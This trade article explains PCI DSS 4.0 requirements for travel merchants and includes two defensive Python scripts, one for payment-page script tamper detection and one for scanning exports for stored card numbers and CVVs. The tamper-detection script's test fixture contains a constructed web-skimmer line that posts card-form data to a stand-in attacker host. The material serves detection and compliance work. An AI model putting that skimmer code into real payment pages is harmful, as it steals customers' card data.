PCI DSS 4.0 Enforcement Is Here: What Travel Merchants Must Know for 2026

PCI DSS 4.0 Is Now in Effect. Travel Merchants Who Lag Face Real Penalties.

The March 31, 2025 deadline has passed. The requirements that PCI DSS 4.0 marked as future-dated are now mandatory, assessments are made against the current revision (v4.0.1), and the travel industry is under particular scrutiny. With roughly 80% of hotel bookings involving card-not-present transactions and 40% of B2B travel payments now flowing through Virtual Credit Cards (VCCs), the sector presents both high volume and high risk.

The International Air Transport Association (IATA) now mandates that all accredited travel agencies demonstrate PCI DSS compliance. This is not a suggestion. It is a condition of accreditation, and non-compliant agents risk fines, merchant account freezes, and reputational damage that can cascade through airline partnerships and OTA relationships.

What Changed in PCI DSS 4.0

Version 4.0 retired the 3.2.1 standard and added 64 new requirements, 51 of them future-dated to March 31, 2025. An annual assessment is still required, but the once-a-year audit mentality is gone: the standard now expects controls to operate and be evidenced continuously between assessments, and the burden of proof sits squarely with merchants.

The core shifts include:

  • Continuous monitoring, annual penetration testing and quarterly vulnerability scanning. Penetration tests are required at least once every 12 months and after any significant change (Requirement 11.4); internal and external vulnerability scans run at least every three months, the external ones by an Approved Scanning Vendor (Requirement 11.3). Security is no longer a once-a-year checkbox. Systems must be tested, validated, and documented on an ongoing basis.
  • Mandatory multi-factor authentication (MFA). Now that the future-dated requirements are in force, MFA applies to all access into the cardholder data environment, not only to administrators (Requirement 8.4.2), and to all remote access that originates outside the entity's network (Requirement 8.4.3).
  • Change-and-tamper detection on payment pages. Booking engines and payment pages must keep an inventory of every script they load, confirm each one is authorized and protect its integrity (Requirement 6.4.3), and run a mechanism that detects unauthorized changes to the HTTP headers and page content received by the customer's browser at least once every seven days, or at a frequency justified by a targeted risk analysis (Requirement 11.6.1).
  • Protected storage of PANs. The standard does not mandate tokenization, but any stored primary account number (PAN) must be rendered unreadable by one of the approved methods: one-way hashing, truncation, index tokens, or strong cryptography (Requirement 3.5.1), and it must be masked when displayed (Requirement 3.4.1). Full PANs can no longer sit in spreadsheets, PMS exports, or unencrypted files. If you can open an Excel file and see a full card number, you are out of compliance.
  • Scope. Every system that stores, processes or transmits cardholder data, and every system connected to or able to affect the security of those systems, is in scope; for a travel merchant that means OTA integrations, GDS links, and cloud-based property management systems wherever they touch card data. Version 4.0 adds an explicit requirement to document and confirm that scope at least once every 12 months (Requirement 12.5.2).
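As an added example, not code from the page or from any vendor it names, the following Python script implements the script inventory and tamper check described above for a payment page. It builds a baseline of authorized external script URLs and SHA-256 hashes of inline scripts from a reviewed, known-good copy of the page, then audits a later copy against that baseline, flagging injected scripts, changed inline code, removed scripts and scripts loaded without a Subresource Integrity attribute. The page HTML, the host names and the injected skimmer-style code are all constructed for illustration.

```python
"""Script inventory and change/tamper check for a payment page.

Added example for PCI DSS v4.0 requirements 6.4.3 (script inventory, authorization,
integrity) and 11.6.1 (change-and-tamper detection). The HTML, host names and
injected code below are constructed for illustration; they are not real sites."""
import hashlib
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Collects external script sources (with any SRI integrity value) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # list of (src, integrity-or-None)
        self.inline = []        # list of inline script text
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], a.get("integrity")))
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf).strip())
            self._in_script = False


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def collect_scripts(html):
    c = _ScriptCollector()
    c.feed(html)
    c.close()
    return c.external, c.inline


def make_baseline(known_good_html):
    """Build the authorized inventory from a reviewed, known-good copy of the page."""
    external, inline = collect_scripts(known_good_html)
    return {
        "external": {src for src, _ in external},
        "inline_sha256": {sha256_hex(body) for body in inline},
    }


def audit_page(html, baseline):
    """Compare a freshly fetched page with the baseline; returns (severity, message) findings.
    An empty list means no unauthorized, changed or missing script was found."""
    external, inline = collect_scripts(html)
    findings = []
    seen = set()
    for src, integrity in external:
        seen.add(src)
        if src not in baseline["external"]:
            findings.append(("HIGH", f"unauthorized external script: {src}"))
        elif integrity is None:
            findings.append(("MEDIUM", f"authorized script loaded without SRI integrity: {src}"))
    for src in baseline["external"] - seen:
        findings.append(("MEDIUM", f"expected script missing (removed or swapped): {src}"))
    for body in inline:
        digest = sha256_hex(body)
        if digest not in baseline["inline_sha256"]:
            findings.append(("HIGH", f"inline script not in baseline (sha256 {digest[:16]}...)"))
    return findings


# Constructed known-good payment page: one vetted checkout script and one inline config block.
CLEAN_PAGE = """<html><head>
<script src="https://pay.example.test/checkout.js" integrity="sha384-constructedvalue"></script>
</head><body>
<form id="card-form"><input name="pan"><input name="cvv"></form>
<script>window.checkoutConfig = {merchant: "demo-hotel"};</script>
</body></html>"""

# Constructed tampered copy: an injected third-party script plus a modified inline block
# that posts the form contents to an attacker-controlled host (the classic web skimmer pattern).
TAMPERED_PAGE = CLEAN_PAGE.replace(
    "</head>",
    '<script src="https://cdn.stats-collector.test/t.js"></script></head>',
).replace(
    'window.checkoutConfig = {merchant: "demo-hotel"};',
    'window.checkoutConfig = {merchant: "demo-hotel"};'
    'document.getElementById("card-form").addEventListener("submit", e => '
    'fetch("https://cdn.stats-collector.test/c", {method: "POST", body: new FormData(e.target)}));',
)


if __name__ == "__main__":
    baseline = make_baseline(CLEAN_PAGE)
    for sev, msg in audit_page(TAMPERED_PAGE, baseline):
        print(sev, msg)
```

In production the page would be fetched from outside the merchant's network, as a customer's browser would receive it, on the schedule 11.6.1 requires, and the baseline would be re-approved through change control whenever the page legitimately changes; anything the audit reports outside that process is a tamper alert to investigate immediately.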

IATA Compliance Is Not Optional

IATA’s stance is clear: accredited travel agencies must comply with PCI DSS to protect payment data. The association has partnered with VikingCloud and other Qualified Security Assessors to simplify certification, but the responsibility remains with each agent.

Agencies that fail to comply face a predictable cascade of consequences:

  • Card scheme fines passed down through acquirers
  • Fraud losses and chargeback liability
  • Termination of merchant accounts
  • Loss of IATA accreditation

The IATA PCI DSS portal provides a step-by-step submission process, but documentation alone is not enough. Agents must add the technical controls, not just fill out the forms.

Virtual Credit Cards Add Complexity

VCCs have become the backbone of OTA-hotel reconciliation. They simplify commission tracking and reduce fraud exposure when implemented correctly. Under PCI DSS 4.0 a VCC number is a PAN like any other: it carries exactly the same storage, masking and access requirements as the number on a physical card.

Common failure points include:

  • Downloading VCC details into unencrypted files or email
  • Storing CVV codes after authorization. Sensitive authentication data may never be retained once a transaction is authorized, not even encrypted (Requirement 3.3.1).
  • Failing to match VCCs to booking references automatically
  • Manual reconciliation processes that expose PANs
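As an added example, not code from the page or from any vendor it names, the following Python script does the check behind two of these failure points and behind the "open an Excel file and see a full card number" test above: it scans an exported reconciliation file for full PANs (Luhn-validated, so booking references and invoice numbers are not reported) and for CVV values sitting in a column after authorization, and it can redact a file to the masked form the standard permits for display. The export, the column names and the card numbers are constructed; the card numbers are the brands' published test numbers.

```python
"""Find stored full PANs and sensitive authentication data in a PMS or VCC export.

Added example for PCI DSS v4.0 requirements 3.3.1 (no SAD after authorization),
3.4.1 (masking on display) and 3.5.1 (stored PAN unreadable). The export below is
constructed; the card numbers are the card brands' published test numbers."""
import csv
import io
import re

# 13 to 19 digits, optionally separated by single spaces or hyphens, not adjacent to other digits.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
# Column names that hold sensitive authentication data, which may never be stored after authorization.
SAD_HEADER = re.compile(r"^(cvv2?|cvc2?|cid|security[_ ]?code|pin)$", re.IGNORECASE)


def luhn_ok(digits):
    """Luhn check-digit validation; filters out booking references and invoice numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(digits):
    """Keep at most the first six and last four digits (the default display limit in 3.4.1)."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_pans(text):
    """Return [(offset, masked_pan)] for each Luhn-valid candidate found in text."""
    hits = []
    for m in CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            hits.append((m.start(), mask_pan(digits)))
    return hits


def redact(text):
    """Replace each Luhn-valid PAN in text with its masked form; other digit runs are untouched."""
    def repl(m):
        digits = re.sub(r"[ -]", "", m.group())
        return mask_pan(digits) if luhn_ok(digits) else m.group()
    return CANDIDATE.sub(repl, text)


def scan_csv(content):
    """Scan a CSV export; returns (row_number, column_name, issue) for each violation found."""
    findings = []
    reader = csv.reader(io.StringIO(content))
    header = [h.strip() for h in next(reader, [])]
    sad_cols = {i for i, h in enumerate(header) if SAD_HEADER.match(h)}
    for row_no, row in enumerate(reader, start=2):   # the header is row 1
        for col, cell in enumerate(row):
            name = header[col] if col < len(header) else f"column{col + 1}"
            for _, masked in find_pans(cell):
                findings.append((row_no, name, f"full PAN stored: {masked}"))
            if col in sad_cols and cell.strip():
                findings.append((row_no, name, "CVV/SAD retained after authorization"))
    return findings


# Constructed reconciliation export of the kind an OTA or PMS might produce.
SAMPLE_EXPORT = "\n".join([
    "booking_ref,guest,vcc_number,expiry,cvv,amount",
    "BK-100234,Doe,4111 1111 1111 1111,12/27,123,412.00",
    "BK-100235,Lee,5555555555554444,03/28,,189.50",
    "BK-100236,Kim,invoice 1234567890123456,,,0.00",
    "BK-100237,Ali,378282246310005,09/26,4321,1020.00",
])

if __name__ == "__main__":
    for row_no, column, issue in scan_csv(SAMPLE_EXPORT):
        print(f"row {row_no} [{column}]: {issue}")
```

Run it over every export, mailbox attachment and shared-drive spreadsheet turned up while mapping the data flow; the expiry column is allowed, the CVV column is not, and any row with a full PAN is evidence that the reconciliation process still handles live card numbers rather than tokens.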

The fix is operational, not just technical. Hotels and agencies need automated tokenization, MFA-secured PMS environments, and real-time authorization holds at check-in to prevent duplicate or expired charges.

Compliance Pays for Itself

According to 2025 benchmarks from Antravia Advisory, tokenized, PCI 4.0-compliant travel businesses paid an average of 1.8% in interchange fees, compared with 2.9% for non-compliant merchants. Chargeback rates dropped from 1.8% to 0.6%. Audit costs fell by two-thirds.

IBM’s 2025 data breach report puts the average hospitality breach at $4.5 million. PCI fines can exceed $100,000 per month. The math is not complicated.

Merchant Levels and What They Mean

PCI DSS applies to all merchants, with no small-business exemption. Merchant levels are defined by the card brands and applied by your acquirer; the thresholds below are Visa's, and Mastercard's are similar. The validation burden scales with volume:

  • Level 1: Over 6 million transactions annually, or any merchant the card brand designates. Annual Report on Compliance (ROC) by a Qualified Security Assessor (or qualified internal assessor) plus quarterly external scans by an Approved Scanning Vendor (ASV).
  • Level 2: 1 to 6 million transactions. Annual Self-Assessment Questionnaire (SAQ) plus quarterly ASV scans.
  • Level 3: 20,000 to 1 million e-commerce transactions. Annual SAQ and quarterly ASV scans.
  • Level 4: Under 20,000 e-commerce transactions (or up to 1 million total). Annual SAQ and quarterly ASV scans where the SAQ calls for them; the acquirer sets the validation requirements.

Which SAQ you complete (A, A-EP, D and so on) is determined by how card data is handled, not by your level: a Level 4 agency whose own systems touch live card numbers still answers the full SAQ D. Even small agencies processing a few thousand transactions annually must complete the SAQ for their payment channel and run the quarterly scans it requires. There is no exemption for low volume.

What Travel Merchants Should Do Now

Map your data flow. Document exactly where card data enters, moves, and is stored. Include your PMS, OTA interfaces, payment gateways, and any manual processes.

Segment your networks. Card-processing systems must be isolated from general business networks, Wi-Fi, and email servers.

Enable MFA everywhere. PMS, booking engines, email platforms used for invoicing. No exceptions.

Keep live card data out of your systems. If your own systems receive, process or store live card data, you are in scope for SAQ D, the full questionnaire. If the payment page is delivered entirely by a PCI DSS-compliant provider (hosted page, redirect or iframe), you may qualify for SAQ A; if your site controls how card data is sent to the provider, for example a form that posts directly to it, you may qualify for SAQ A-EP. Processors such as Stripe or Adyen hand back a token that your PMS and reconciliation can use for later charges, so full PANs never need to touch your own systems or spreadsheets.

Test continuously. Penetration tests at least annually and after every significant change, vulnerability scans every quarter, change-and-tamper detection on payment pages at least weekly, and monthly VCC reconciliation with immediate investigation of mismatches.

Key Takeaways

  • PCI DSS 4.0's future-dated requirements became mandatory on March 31, 2025. The grace period is over.
  • IATA requires accredited travel agencies to comply. Non-compliance risks accreditation, fines, and merchant account termination.
  • A VCC number is a PAN and is protected like any other card number. Stored PANs must be rendered unreadable, and MFA is required for all access into the cardholder data environment.
  • Compliance reduces interchange fees, chargebacks, and audit costs while protecting against breaches averaging $4.5 million.
  • There is no small-business exemption. All merchants must validate compliance annually.

Travel merchants that treat PCI DSS 4.0 as a strategic operational discipline will gain a measurable cost and trust advantage. Those that treat it as paperwork risk fines, breaches, and lost partnerships. The choice is binary, and the deadline has passed.

Sources: Antravia Advisory, IATA PCI DSS Standards, PCI Security Standards Council

Editor

With decades of combined experience spanning all facets of the travel and merchant processing industries, our editorial team brings unparalleled insight to Travel Merchant News. Our expertise encompasses every angle of the travel sector, from seasoned travelers who have explored the world to travel operators who have built and managed successful tourism businesses. On the merchant processing side, we've worked extensively with payment solutions tailored specifically for the travel space, understanding the unique challenges and opportunities that travel businesses face in payment processing, transaction management, and financial operations. This comprehensive knowledge allows us to deliver content that truly speaks to the needs of travel professionals navigating the complex intersection of travel services and merchant solutions.
